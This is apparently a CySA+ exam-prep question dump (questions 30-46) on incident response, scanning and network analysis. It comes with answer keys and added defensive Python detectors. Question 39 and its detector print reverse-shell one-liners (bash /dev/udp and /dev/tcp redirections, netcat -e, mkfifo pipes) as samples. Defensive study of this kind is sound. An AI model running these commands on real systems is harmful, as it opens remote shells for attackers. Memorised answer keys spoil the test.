CS0 003 21 30

The document presents a series of cybersecurity questions and answers, focusing on network security, incident response, vulnerability management, and malware analysis. It emphasizes the importance of identifying suspicious devices, securing investigation scenes, and understanding communication protocols during security incidents. Additionally, it highlights various scanning methods and the significance of employee training in mitigating risks associated with sensitive information disclosure.


QUESTION: 30

Due to reports of unauthorized activity that was occurring on the internal network, an analyst is
performing a network discovery. The analyst runs an Nmap scan against a corporate network to
evaluate which devices were operating in the environment. Given the following output:

Which of the following choices should the analyst look at first?

A. wh4dc-748gy.lan (192.168.86.152)
B. lan (192.168.86.22)
C. imaging.lan (192.168.86.150)
D. xlaptop.lan (192.168.86.249)
E. p4wnp1_aloa.lan (192.168.86.56)

Answer(s): E

Explanation:

The analyst should look at p4wnp1_aloa.lan (192.168.86.56) first, as it is the most suspicious
device on the network. P4wnP1 A.L.O.A. is an open-source project that turns a Raspberry Pi Zero W
into a malicious USB device capable of keystroke injection, network sniffing, man-in-the-middle
attacks and backdoor creation. A host announcing that name suggests someone has plugged such a
device into a system and obtained a foothold on the network. A hostname is self-reported (via DHCP
or mDNS) and trivially changed, so the match is the lead to chase first, not proof: if the scan ran
with privileges on the local segment, Nmap also reports MAC addresses and vendor OUIs, and those,
together with the switch port the device is attached to, are what locate it physically. The other
names follow the normal corporate naming pattern (or, for 192.168.86.22, returned no hostname at
all), which makes them lower priority than an explicit attack-tool name.

Reference:

https://github.com/mame82/P4wnP1_aloa
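The triage the question describes can be scripted for larger networks. The block below is an added example, not code from the page or from the P4wnP1 project: it parses Nmap grepable (-oG) output, scores each live host on whether its name contains a fragment from an assumed tool watchlist or falls outside an assumed corporate naming convention, and prints the most suspicious hosts first. The sample scan text is constructed from the hosts listed in the answer choices (the page's own output is not reproduced), and both the watchlist and the naming regex are assumptions to replace with your own.

```python
import re
from dataclasses import dataclass, field

# Constructed stand-in for the Nmap output the question refers to, in grepable
# (-oG) form; host names and addresses come from the answer choices, the rest
# of each line is synthetic.
SAMPLE_NMAP_GREPABLE = """\
# Nmap 7.94 scan initiated as: nmap -sn -oG - 192.168.86.0/24
Host: 192.168.86.22 (lan)\tStatus: Up
Host: 192.168.86.56 (p4wnp1_aloa.lan)\tStatus: Up
Host: 192.168.86.150 (imaging.lan)\tStatus: Up
Host: 192.168.86.152 (wh4dc-748gy.lan)\tStatus: Up
Host: 192.168.86.249 (xlaptop.lan)\tStatus: Up
Host: 192.168.86.250 (printer01.lan)\tStatus: Down
# Nmap done -- 256 IP addresses (5 hosts up) scanned
"""

HOST_LINE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)\s+Status:\s+(\w+)")

# Assumed watchlist of hostname fragments tied to offensive tooling. "p4wnp1"
# is the project named in the question's reference; "kali" is the default
# hostname of a stock Kali Linux install. Extend with your own entries.
TOOL_WATCHLIST = ("p4wnp1", "kali")

# Assumed corporate naming convention: RFC 1123 hostname labels (letters,
# digits, hyphens) under the .lan domain. Underscores are not valid in a
# hostname label, so a name carrying one was not issued by a normal host build.
NAMING_CONVENTION = re.compile(r"^[a-z0-9-]+\.lan$")


@dataclass
class Finding:
    ip: str
    hostname: str
    reasons: list = field(default_factory=list)

    @property
    def watchlist_hit(self) -> bool:
        return any(r.startswith("watchlist") for r in self.reasons)


def parse_grepable(text: str):
    """Yield (ip, hostname) for every host Nmap reported as up."""
    for line in text.splitlines():
        m = HOST_LINE.match(line)
        if m and m.group(3) == "Up":
            yield m.group(1), m.group(2)


def triage(text: str, watchlist=TOOL_WATCHLIST) -> list:
    """Rank live hosts by how suspicious their self-reported name is."""
    findings = []
    for ip, name in parse_grepable(text):
        f = Finding(ip, name)
        low = name.lower()
        for fragment in watchlist:
            if fragment in low:
                f.reasons.append(f"watchlist: hostname contains '{fragment}'")
        if not name:
            f.reasons.append("no hostname returned")
        elif not NAMING_CONVENTION.match(low):
            f.reasons.append("hostname outside corporate naming convention")
        findings.append(f)
    # Watchlist hits first, then the most reasons, then address for stable output.
    findings.sort(key=lambda f: (not f.watchlist_hit, -len(f.reasons), f.ip))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_NMAP_GREPABLE):
        print(f"{f.ip:<16} {f.hostname or '-':<20} {'; '.join(f.reasons) or 'nothing unusual'}")
```

Run it against `nmap -sn -oG - <range>` output saved to a file. The ordering is only a starting point for the analyst's attention; a quiet host with a conforming name can still be the intruder, so the ranking supplements, rather than replaces, the MAC/OUI and switch-port checks.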

QUESTION: 31

When starting an investigation, which of the following must be done first?

A. Notify law enforcement
B. Secure the scene
C. Seize all related evidence
D. Interview the witnesses

Answer(s): B
Explanation:

The first thing that must be done when starting an investigation is to secure the scene. Securing the
scene involves isolating and protecting the area where the incident occurred, as well as any potential
evidence or witnesses. Securing the scene can help prevent any tampering, contamination, or
destruction of evidence, as well as any interference or obstruction of the investigation.

QUESTION: 32

Which of the following describes how a CSIRT lead determines who should be communicated with
and when during a security incident?

A. The lead should review what is documented in the incident response policy or plan
B. Management level members of the CSIRT should make that decision
C. The lead has the authority to decide who to communicate with at any time
D. Subject matter experts on the team should communicate with others within the specified
area of expertise

Answer(s): A

Explanation:

The incident response policy or plan is a document that defines the roles and responsibilities,
procedures and processes, communication and escalation protocols, and reporting and
documentation requirements for handling security incidents. The lead should review what is
documented in the incident response policy or plan to determine who should be communicated with
and when during a security incident, as well as what information should be shared and how. The
incident response policy or plan should also be aligned with the organizational policies and legal
obligations regarding incident notification and disclosure.

QUESTION: 33
A new cybersecurity analyst is tasked with creating an executive briefing on possible threats to the
organization.

Which of the following will produce the data needed for the briefing?

A. Firewall logs
B. Indicators of compromise
C. Risk assessment
D. Access control lists

Answer(s): B

Explanation:

Indicators of compromise (IoCs) are pieces of data or evidence that suggest a system or network has
been compromised by an attacker or malware. IoCs can include IP addresses, domain names, URLs,
file hashes, registry keys, network traffic patterns, user behaviors, or system anomalies. IoCs can be
used to detect, analyze, and respond to security incidents, as well as to share threat intelligence with
other organizations or authorities. IoCs can produce the data needed for an executive briefing on
possible threats to the organization, as they can provide information on the source, nature, scope,
impact, and mitigation of the threats.

QUESTION: 34

An analyst notices there is an internal device sending HTTPS traffic with additional characters in the
header to a known-malicious IP in another country.

Which of the following describes what the analyst has noticed?

A. Beaconing
B. Cross-site scripting
C. Buffer overflow
D. PHP traversal

Answer(s): A
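Beaconing is the periodic check-in of an implant with its command-and-control server. In the question the tell is a malformed HTTPS header to a known-bad address; when there is no such indicator, the complementary signal is timing regularity. The block below is an added example, not code from the page: it groups outbound connections by source, destination and port, measures the jitter of the inter-connection gaps (coefficient of variation, the standard deviation divided by the mean gap), and flags pairs that are too regular to be a person. The connection records are constructed, with documentation addresses standing in for the malicious IP and an ordinary web destination, and the thresholds are assumptions to tune against your own traffic.

```python
from collections import defaultdict
from statistics import mean, pstdev

# Constructed outbound-connection records (epoch seconds, src, dst, dst port).
# 203.0.113.77 stands in for the "known-malicious IP", 198.51.100.10 for an
# ordinary web destination; neither is a real observation.
BASE = 1_700_000_000
CONNECTIONS = (
    # an implant checking in every ~300 s with a little jitter
    [(BASE + 300 * i + j, "10.0.5.23", "203.0.113.77", 443)
     for i, j in enumerate((0, 2, -1, 3, 0, 1, -2, 0, 2, 1))]
    # a person browsing: bursts followed by long idle gaps
    + [(BASE + t, "10.0.5.23", "198.51.100.10", 443)
       for t in (0, 7, 60, 61, 400, 1900, 1950, 3600, 9000)]
    # too few events to judge either way
    + [(BASE + t, "10.0.5.40", "203.0.113.77", 443) for t in (10, 310, 611)]
)


def beacon_candidates(records, min_events=8, max_cv=0.2):
    """Return {(src, dst, dport): (count, mean_gap, cv)} for pairs whose
    inter-connection gaps are regular enough to look like a beacon.
    min_events and max_cv are assumed thresholds, not standard values."""
    times = defaultdict(list)
    for ts, src, dst, dport in records:
        times[(src, dst, dport)].append(ts)
    flagged = {}
    for key, ts in times.items():
        if len(ts) < min_events:
            continue                      # not enough samples for a verdict
        ts.sort()
        gaps = [b - a for a, b in zip(ts, ts[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue                      # duplicate timestamps; skip
        cv = pstdev(gaps) / avg           # jitter relative to the period
        if cv <= max_cv:
            flagged[key] = (len(ts), avg, cv)
    return flagged


if __name__ == "__main__":
    for (src, dst, dport), (n, avg, cv) in beacon_candidates(CONNECTIONS).items():
        print(f"{src} -> {dst}:{dport}  events={n}  period~{avg:.0f}s  cv={cv:.3f}")
```

Implants add random sleep jitter precisely to defeat this check, so in practice combine it with the indicator-based signals the question uses (known-bad destination, odd header contents, rare user agents) and with the Cyber Kill Chain view that any confirmed beacon means exploitation has already succeeded.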

QUESTION: 35
A security analyst is reviewing a packet capture in Wireshark that contains an FTP session from a
potentially compromised machine. The analyst sets the following display filter: ftp. The analyst can
see there are several RETR requests with 226 Transfer complete responses, but the packet list pane is
not showing the packets containing the file transfer itself.

Which of the following can the analyst perform to see the entire contents of the downloaded files?
A. Change the display filter to ftp.active.port
B. Change the display filter to tcp.port=20
C. Change the display filter to ftp-data and follow the TCP streams
D. Navigate to the File menu and select FTP from the Export objects option

Answer(s): C

Explanation:

The best way to see the entire contents of the downloaded files in Wireshark is to change the display
filter to ftp-data and follow the TCP streams. FTP carries commands and replies on the control
connection (port 21) and file contents on a separate data connection. Wireshark's ftp-data dissector
watches the PORT and PASV negotiation on the control channel and tags the resulting data connections,
so the ftp-data filter shows the transferred bytes regardless of mode, and following each TCP stream
reconstructs the file. A filter on tcp.port=20 catches only active-mode transfers, where the server
connects out from port 20; in passive mode, which most clients use by default, the server listens on
an ephemeral port and nothing touches port 20, so those transfers stay hidden. ftp.active.port is not
a complete answer either, as it only identifies the port announced in a PORT command. Recent
Wireshark releases also list FTP-DATA under File > Export Objects, built on the same dissector, which
is a quicker way to carve out whole files once the data connections have been identified.
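To make the passive/active distinction concrete, the block below is an added example (not code from the page or from Wireshark) that walks a constructed FTP control-channel transcript, decodes each PASV reply and PORT command into the data endpoint it announces (host from the first four numbers, port = p1*256 + p2), pairs that endpoint with the RETR that follows, and emits the Wireshark filter that would isolate each data stream. This mirrors what the ftp-data dissector does internally; the addresses and file names are constructed.

```python
import re

# Constructed FTP control-channel transcript (C: client, S: server); the
# addresses are documentation ranges and no real capture was used.
CONTROL_SESSION = """\
C: USER anonymous
S: 331 Please specify the password.
C: PASS guest@
S: 230 Login successful.
C: TYPE I
S: 200 Switching to Binary mode.
C: PASV
S: 227 Entering Passive Mode (192,0,2,10,195,80).
C: RETR payload.bin
S: 150 Opening BINARY mode data connection for payload.bin (4096 bytes).
S: 226 Transfer complete.
C: PORT 10,0,5,23,4,1
S: 200 PORT command successful. Consider using PASV.
C: RETR tools.tar
S: 150 Opening BINARY mode data connection for tools.tar (81920 bytes).
S: 226 Transfer complete.
C: QUIT
S: 221 Goodbye.
"""

PASV_RE = re.compile(r"227 .*?\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)")
PORT_RE = re.compile(r"^PORT (\d+),(\d+),(\d+),(\d+),(\d+),(\d+)$")


def _endpoint(groups):
    """Decode the h1,h2,h3,h4,p1,p2 form used by both PASV replies and PORT."""
    h1, h2, h3, h4, p1, p2 = map(int, groups)
    return f"{h1}.{h2}.{h3}.{h4}", p1 * 256 + p2


def data_connections(transcript: str) -> list:
    """Pair each RETR with the data connection negotiated just before it."""
    pending = None                      # endpoint announced by the last PASV/PORT
    transfers = []
    for line in transcript.splitlines():
        who, _, text = line.partition(": ")
        if who == "S" and (m := PASV_RE.search(text)):
            pending = ("passive", _endpoint(m.groups()))   # client connects to server:port
        elif who == "C" and (m := PORT_RE.match(text)):
            pending = ("active", _endpoint(m.groups()))    # server connects from :20 to client:port
        elif who == "C" and text.startswith("RETR ") and pending:
            mode, (host, port) = pending
            transfers.append({
                "file": text[5:],
                "mode": mode,
                "data_filter": f"ip.addr=={host} && tcp.port=={port}",
                "port20_visible": mode == "active",   # only active mode ever uses port 20
            })
            pending = None
    return transfers


if __name__ == "__main__":
    for t in data_connections(CONTROL_SESSION):
        print(f"{t['file']:<12} {t['mode']:<8} filter: {t['data_filter']}"
              f"  (seen by tcp.port==20: {t['port20_visible']})")
```

The first transfer in the sample rides on server port 50000 and would never appear under a port-20 filter, which is exactly the gap the ftp-data filter closes.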

QUESTION: 36

A SOC manager receives a phone call from an upset customer. The customer received a vulnerability
report two hours ago, but the report did not have a follow-up remediation response from an analyst.

Which of the following documents should the SOC manager review to ensure the team is meeting
the appropriate contractual obligations for the customer?

A. SLA
B. MOU
C. NDA
D. Limitation of liability

Answer(s): A

Explanation:

SLA stands for service level agreement, which is a contract or document that defines the
expectations and obligations between a service provider and a customer regarding the quality,
availability, performance, or scope of a service. An SLA may also specify the metrics, penalties, or
remedies for measuring or ensuring compliance with the agreed service levels. An SLA can help the
SOC manager review if the team is meeting the appropriate contractual obligations for the customer,
such as response time, resolution time, reporting frequency, or communication channels.

QUESTION: 37
Which of the following phases of the Cyber Kill Chain involves the adversary attempting to establish
communication with a successfully exploited target?

A. Command and control
B. Actions on objectives
C. Exploitation
D. Delivery

Answer(s): A

Explanation:

Command and control (C2) is a phase of the Cyber Kill Chain that involves the adversary attempting
to establish communication with a successfully exploited target. C2 enables the adversary to
remotely control or manipulate the target system or network using various methods, such as
malware callbacks, backdoors, botnets, or covert channels. C2 allows the adversary to maintain
persistence, exfiltrate data, execute commands, deliver payloads, or spread to other systems or
networks.

QUESTION: 38

A company that has a geographically diverse workforce and dynamic IPs wants to implement a
vulnerability scanning method with reduced network traffic.

Which of the following would best meet this requirement?

A. External
B. Agent-based
C. Non-credentialed
D. Credentialed

Answer(s): B

Explanation:
Agent-based vulnerability scanning is a method that involves installing software agents on the target
systems or networks that can perform local scans and report the results to a central server or
console. Agent-based vulnerability scanning can reduce network traffic, as the scans are performed
locally and only the results are transmitted over the network. Agent-based vulnerability scanning can
also provide more accurate and up-to-date results, as the agents can scan continuously or on-
demand, regardless of the system or network status or location.

QUESTION: 39

A security analyst detects an exploit attempt containing the following command:

sh -i >& /dev/udp/10.1.1.1/4821 0>&1

Which of the following is being attempted?

A. RCE
B. Reverse shell
C. XSS
D. SQL injection

Answer(s): B

Explanation:

A reverse shell is a type of shell access that allows a remote user to execute commands on a target
system or network by reversing the normal direction of communication. A reverse shell is usually
created by running a malicious script or program on the target system that connects back to the
remote user's system and opens a shell session. A reverse shell can bypass firewalls or other security
controls that block incoming connections, as it uses an outgoing connection initiated by the target
system. In this case, the security analyst has detected an exploit attempt containing the following
command:

sh -i >& /dev/udp/10.1.1.1/4821 0>&1

This one-liner starts an interactive shell (sh -i), redirects its standard output and standard error
(>&) to /dev/udp/10.1.1.1/4821, and duplicates standard input from that same descriptor (0>&1), so
the host at 10.1.1.1 on UDP port 4821 both receives the shell's output and supplies its commands. The
/dev/tcp and /dev/udp paths are not real device files: bash opens them as network sockets when they
appear in a redirection, so the command needs bash (or a shell with the same feature) behind the sh
name rather than a minimal shell such as dash. The choice of UDP is worth noting: it slips past egress
rules that only restrict outbound TCP, and a shell process opening an outbound UDP socket to an
unusual high port is by itself a strong detection signal.
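Detecting this family of one-liners in process or audit logs is a matter of a few patterns. The block below is an added example, not code from the page: it classifies command lines as bash /dev/tcp or /dev/udp redirections, netcat -e/-c shells, or the mkfifo-plus-netcat pipe used where netcat lacks -e, and extracts the transport, host and port for each. The sample command lines are constructed, except the first, which is the command from the question; the pattern set is a starting point, not an exhaustive catalogue.

```python
import re

# bash-style redirection to the /dev/tcp and /dev/udp pseudo-paths
DEV_NET = re.compile(r"/dev/(tcp|udp)/(\d{1,3}(?:\.\d{1,3}){3})/(\d{1,5})")
# netcat family, optional flags, then destination host and port
NC_CONNECT = re.compile(
    r"\b(?:nc|ncat|netcat)\s+(?:-\S+\s+)*(\d{1,3}(?:\.\d{1,3}){3}|[\w.-]+)\s+(\d{1,5})\b")
# -e/-c handing the connection to a shell
NC_EXEC_FLAG = re.compile(r"\s-[ec]\s+\S*sh\b")

# Constructed process-command-line samples; the first is the command from the
# question, the rest are synthetic (documentation addresses throughout).
SAMPLE_COMMANDS = [
    "sh -i >& /dev/udp/10.1.1.1/4821 0>&1",
    "bash -i >& /dev/tcp/192.0.2.5/4444 0>&1",
    "nc 198.51.100.9 9001 -e /bin/sh",
    "rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | sh -i 2>&1 | nc 203.0.113.4 1234 > /tmp/f",
    "tar -czf /backup/logs.tgz /var/log",
    "curl -s https://example.com/api/v1/status",
]


def classify(cmdline: str):
    """Return a dict describing the reverse shell, or None if nothing matched."""
    if m := DEV_NET.search(cmdline):
        proto, host, port = m.groups()
        return {"technique": f"bash /dev/{proto} redirection", "transport": proto,
                "host": host, "port": int(port),
                # >& sends stdout/stderr to the socket; 0>&1 (or 0<&1) pulls stdin from it
                "interactive": "0>&1" in cmdline or "0<&1" in cmdline}
    if m := NC_CONNECT.search(cmdline):
        host, port = m.groups()
        transport = "udp" if re.search(r"\s-u\b", cmdline) else "tcp"
        if NC_EXEC_FLAG.search(cmdline):
            technique = "nc -e"
        elif "mkfifo" in cmdline:
            technique = "mkfifo pipe"
        else:
            return None          # a plain nc connection is not by itself a shell
        return {"technique": technique, "transport": transport,
                "host": host, "port": int(port), "interactive": True}
    return None


def scan(cmdlines):
    """Return (cmdline, verdict) for every command line that looks like a reverse shell."""
    return [(c, v) for c in cmdlines if (v := classify(c))]


if __name__ == "__main__":
    for cmd, verdict in scan(SAMPLE_COMMANDS):
        print(f"{verdict['technique']:<26} {verdict['transport']} -> "
              f"{verdict['host']}:{verdict['port']}   {cmd}")
```

Feed it the command field from auditd execve records, EDR process telemetry or a shell history. Pair it with the network side: the same IP and port should appear as an outbound connection from the shell process, which confirms the attempt succeeded rather than merely being typed.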

QUESTION: 40

An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available
exploit being used to deliver ransomware.
Which of the following factors would an analyst most likely communicate as the reason for this
escalation?

A. Scope
B. Weaponization
C. CVSS
D. Asset value

Answer(s): B

Explanation:

Weaponization describes an adversary developing or acquiring a working exploit or payload for a
vulnerability and packaging it for delivery. It raises the practical severity of a vulnerability
because exploitation becomes easier, cheaper and more likely, and it signals how motivated the
attackers are and how widely the exploit circulates. In this case an older CVE scored 7.1 was
re-rated 9.8 because a widely available exploit is being used to deliver ransomware, so
weaponization is the reason the analyst should communicate. Note that the CVSS base score itself
never moves when an exploit appears: exploit availability lives in the temporal metric group of
CVSS v3 (Exploit Code Maturity) and the threat metric group of CVSS v4, and those metrics can only
lower a score or restore it to the base value, never raise it above it. A jump from 7.1 to 9.8
therefore reflects the organization's own risk rescoring (or an overlay such as a
known-exploited-vulnerabilities list), which is why "CVSS" is not the explanation to give.

QUESTION: 41

An analyst is reviewing a vulnerability report for a server environment with the following entries:

Which of the following systems should be prioritized for patching first?

A. 10.101.27.98
B. 54.73.225.17
C. 54.74.110.26
D. 54.74.110.228

Answer(s): D

Explanation:
The system that should be prioritized for patching first is 54.74.110.228, as it has the highest number
and severity of vulnerabilities among the four systems listed in the vulnerability report. According to
the report, this system has 12 vulnerabilities, with 8 critical, 3 high, and 1 medium severity ratings.
The critical vulnerabilities include CVE-2019-0708 (BlueKeep), CVE-2019-1182 (DejaBlue), CVE-2017-
0144 (EternalBlue), and CVE-2017-0145 (EternalRomance), which are all remote code execution
vulnerabilities that can allow an attacker to compromise the system without any user interaction or
authentication. These vulnerabilities pose a high risk to the system and should be patched as soon as
possible.
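Questions 40 and 41 both come down to letting exploit availability, not the base score alone, drive patch order. The block below is an added example, not code from the page: it implements the CVSS v3.1 temporal score (weights and Roundup function as in the specification), which shows that exploit maturity can only pull a score down from its base, and then ranks hosts with an assumed policy that puts systems exposed to in-the-wild exploits first. The threat-intelligence table uses the CVE identifiers the page names, but its scores, maturity codes and in-the-wild flags are illustrative rather than NVD or KEV data, and the per-host table is a constructed, scaled-down stand-in for the report missing from the page.

```python
import math

# CVSS v3.1 temporal weights: Exploit Code Maturity, Remediation Level,
# Report Confidence (X = not defined).
EXPLOIT_MATURITY = {"X": 1.0, "U": 0.91, "P": 0.94, "F": 0.97, "H": 1.0}
REMEDIATION_LEVEL = {"X": 1.0, "O": 0.95, "T": 0.96, "W": 0.97, "U": 1.0}
REPORT_CONFIDENCE = {"X": 1.0, "U": 0.92, "R": 0.96, "C": 1.0}


def roundup(x):
    """CVSS v3.1 Roundup: smallest one-decimal value >= x, computed on integers
    exactly as the specification prescribes to avoid floating-point drift."""
    i = round(x * 100000)
    if i % 10000 == 0:
        return i / 100000.0
    return (math.floor(i / 10000) + 1) / 10.0


def temporal_score(base, e="X", rl="X", rc="X"):
    """Temporal = Roundup(Base * E * RL * RC); every weight is <= 1.0, so the
    result can never exceed the base score."""
    return roundup(base * EXPLOIT_MATURITY[e] * REMEDIATION_LEVEL[rl] * REPORT_CONFIDENCE[rc])


# Constructed threat-intelligence table keyed by the CVE identifiers the page
# names; scores, maturity codes and in-the-wild flags are illustrative only.
INTEL = {
    "CVE-2019-0708": {"base": 9.8, "e": "H", "in_the_wild": True},   # BlueKeep
    "CVE-2019-1182": {"base": 9.8, "e": "P", "in_the_wild": False},  # DejaBlue
    "CVE-2017-0144": {"base": 8.1, "e": "H", "in_the_wild": True},   # EternalBlue
    "CVE-2017-0145": {"base": 8.1, "e": "H", "in_the_wild": True},   # EternalRomance
}

# Constructed, scaled-down stand-in for the report table missing from the page.
HOST_FINDINGS = {
    "10.101.27.98":  ["CVE-2019-1182"],
    "54.73.225.17":  ["CVE-2017-0145"],
    "54.74.110.26":  ["CVE-2019-1182", "CVE-2017-0145"],
    "54.74.110.228": ["CVE-2019-0708", "CVE-2019-1182", "CVE-2017-0144", "CVE-2017-0145"],
}


def host_summary(host, cves, intel=INTEL):
    scores = [temporal_score(intel[c]["base"], intel[c]["e"]) for c in cves]
    weaponized = sum(1 for c in cves if intel[c]["in_the_wild"])
    return {"host": host, "weaponized": weaponized,
            "max_temporal": max(scores), "count": len(cves)}


def prioritize(findings=HOST_FINDINGS, intel=INTEL):
    """Assumed policy: hosts exposed to exploits seen in the wild first, then the
    highest exploit-adjusted score, then the number of findings."""
    rows = [host_summary(h, c, intel) for h, c in findings.items()]
    rows.sort(key=lambda r: (r["weaponized"], r["max_temporal"], r["count"]), reverse=True)
    return rows


if __name__ == "__main__":
    print("7.1 with functional exploit, no fix, confirmed:",
          temporal_score(7.1, "F", "U", "C"))      # lower than 7.1, never higher
    for r in prioritize():
        print(f"{r['host']:<15} weaponized={r['weaponized']} "
              f"max_temporal={r['max_temporal']} findings={r['count']}")
```

In the sample ranking a host carrying only an unproven 9.8 lands below a host with a weaponized 8.1, which is the point of question 40 applied to the patch queue of question 41; swap in your own intel feed (KEV, EPSS, vendor advisories) for the INTEL table.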

QUESTION: 42

A company is in the process of implementing a vulnerability management program, and there are
concerns about granting the security team access to sensitive data.

Which of the following scanning methods can be implemented to reduce the access to systems while
providing the most accurate vulnerability scan results?
A. Credentialed network scanning
B. Passive scanning
C. Agent-based scanning
D. Dynamic scanning

Answer(s): C

Explanation:

Agent-based scanning installs a lightweight agent on each target system; the agent inspects the
local system (installed packages, configuration, running services) with the privileges it was
granted at install time and reports findings to a central console. This reduces the access the
security team needs: no scanning credentials for the systems have to be handed over, stored in the
scanner or sent across the network, and the team sees vulnerability results rather than the
sensitive data on the hosts. Because the agent reads the system from the inside, its results are as
complete as a credentialed scan, and they do not depend on the host being reachable from the scanner
at scan time, so roaming or intermittently connected systems are covered as well.

QUESTION: 43

A security analyst is trying to identify anomalies on the network routing.

Which of the following functions can the analyst use on a shell script to achieve the objective most
accurately?
A. function x() { info=$(geoiplookup $1) && echo "$1 | $info" }
B. function x() { info=$(ping -c 1 $1 | awk -F "/" 'END{print $5}') && echo "$1 | $info" }
C. function x() { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" '{print $1}').origin.asn.cymru.com TXT +short) && echo "$1 | $info" }
D. function x() { info=$(traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $info" }

Answer(s): C

Explanation:

The function that most accurately identifies routing anomalies is option C:

function x() { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" '{print $1}').origin.asn.cymru.com TXT +short) && echo "$1 | $info" }

It takes an IP address as its argument and runs dig twice. The inner dig -x $1 issues a reverse (PTR)
lookup, but the pipeline does not keep the hostname it returns: it takes the last line of dig's output
that mentions PTR and cuts it at ".in-addr", which leaves the address with its octets reversed (for
192.0.2.44, the string 44.2.0.192). The outer dig appends .origin.asn.cymru.com to that reversed
address and asks for the TXT record, which is Team Cymru's IP-to-ASN mapping service; the answer lists
the origin autonomous system number, the announced prefix, country code, registry and allocation
date. Printing the address beside its origin AS lets the analyst spot traffic whose origin or prefix
does not match what is expected for that destination, which geolocation (A), round-trip time (B) or
hop count (D) cannot show. One caveat: the reversed address is scraped from dig's human-readable
output, so the function depends on that format (and on a PTR answer being present); building the
query name directly from the address is more robust.
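The same lookup without scraping dig output, as an added example that is not code from the page or from Team Cymru: it builds the origin query name directly from the address (IPv4 via reversed octets under origin.asn.cymru.com, and, going beyond the page's IPv4 case, IPv6 via reversed nibbles under origin6.asn.cymru.com), parses the TXT answer format, and compares the origin AS seen now with a recorded baseline to flag candidate hijacks or route changes. The TXT answers are constructed and use ASNs from the range reserved for documentation; the resolver argument is a plain callable so the example runs offline, and in production you would pass a real DNS TXT lookup.

```python
import ipaddress

# Constructed TXT answers in the format the origin*.asn.cymru.com zones return
# ("ASN | prefix | CC | registry | allocated"). ASNs 64496-64511 are reserved
# for documentation, so none of these describes a real route.
CONSTRUCTED_TXT = {
    "44.2.0.192.origin.asn.cymru.com": '"64496 | 192.0.2.0/24 | US | arin | 2001-01-01"',
    "9.100.51.198.origin.asn.cymru.com": '"64500 64501 | 198.51.100.0/24 | DE | ripencc | 2010-05-05"',
}


def origin_query_name(ip: str) -> str:
    """Build the query name the dig-based function above derives by scraping."""
    addr = ipaddress.ip_address(ip)
    if addr.version == 4:
        return ".".join(reversed(str(addr).split("."))) + ".origin.asn.cymru.com"
    nibbles = addr.exploded.replace(":", "")        # 32 hex digits
    return ".".join(reversed(nibbles)) + ".origin6.asn.cymru.com"


def parse_origin_txt(txt: str) -> dict:
    """Split the pipe-separated TXT answer; the ASN field may list several ASNs."""
    asns, prefix, cc, registry, allocated = [f.strip() for f in txt.strip().strip('"').split("|")]
    return {"asns": [int(a) for a in asns.split()], "prefix": prefix,
            "country": cc, "registry": registry, "allocated": allocated}


def lookup(ip: str, resolver=CONSTRUCTED_TXT.get):
    """Resolve an IP to its origin-AS data; `resolver` maps a query name to the
    TXT string (or None). The default is the constructed table above."""
    txt = resolver(origin_query_name(ip))
    return parse_origin_txt(txt) if txt else None


def routing_anomalies(baseline: dict, resolver=CONSTRUCTED_TXT.get) -> list:
    """baseline maps destination IP -> origin ASN recorded when traffic was known
    good. Returns (ip, expected_asn, current_asns) for every destination whose
    origin AS no longer includes the expected one."""
    anomalies = []
    for ip, expected in baseline.items():
        current = lookup(ip, resolver)
        if current is None or expected not in current["asns"]:
            anomalies.append((ip, expected, current["asns"] if current else []))
    return anomalies


if __name__ == "__main__":
    for ip in ("192.0.2.44", "198.51.100.9"):
        print(ip, "|", lookup(ip))
    print("anomalies:", routing_anomalies({"192.0.2.44": 64496, "198.51.100.9": 64502}))
```

An origin-AS change for a destination you talk to regularly is exactly the signal the shell function in option C surfaces one address at a time; keeping a baseline and diffing against it turns that into a repeatable check.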

QUESTION: 44

There are several reports of sensitive information being disclosed via file sharing services. The
company would like to improve its security posture against this threat.

Which of the following security controls would best support the company in this scenario?

A. Implement step-up authentication for administrators
B. Improve employee training and awareness
C. Increase password complexity standards
D. Deploy mobile device management

Answer(s): B

Explanation:

The best security control to implement against sensitive information being disclosed via file sharing
services is to improve employee training and awareness. Employee training and awareness can help
educate employees on the risks and consequences of using file sharing services for sensitive
information, as well as the policies and procedures for handling such information securely and
appropriately. Employee training and awareness can also help foster a security culture and
encourage employees to report any incidents or violations of information security.

QUESTION: 45

Which of the following is the best way to begin preparation for a report titled "What We Learned"
regarding a recent incident involving a cybersecurity breach?

A. Determine the sophistication of the audience that the report is meant for
B. Include references and sources of information on the first page
C. Include a table of contents outlining the entire report
D. Decide on the color scheme that will effectively communicate the metrics

Answer(s): A

Explanation:

The best way to begin preparation for a report titled "What We Learned" regarding a recent incident
involving a cybersecurity breach is to determine the sophistication of the audience that the report is
meant for. The sophistication of the audience refers to their level of technical knowledge,
understanding, or interest in cybersecurity topics. Determining the sophistication of the audience
can help tailor the report content, language, tone, and format to suit their needs and expectations.
For example, a report for executive management may be more concise, high-level, and business-
oriented than a report for technical staff or peers.

QUESTION: 46

A security analyst is performing an investigation involving multiple targeted Windows malware
binaries. The analyst wants to gather intelligence without disclosing information to the attackers.

Which of the following actions would allow the analyst to achieve the objective?

A. Upload the binary to an air gapped sandbox for analysis
B. Send the binaries to the antivirus vendor
C. Execute the binaries on an environment with internet connectivity
D. Query the file hashes using VirusTotal

Answer(s): A
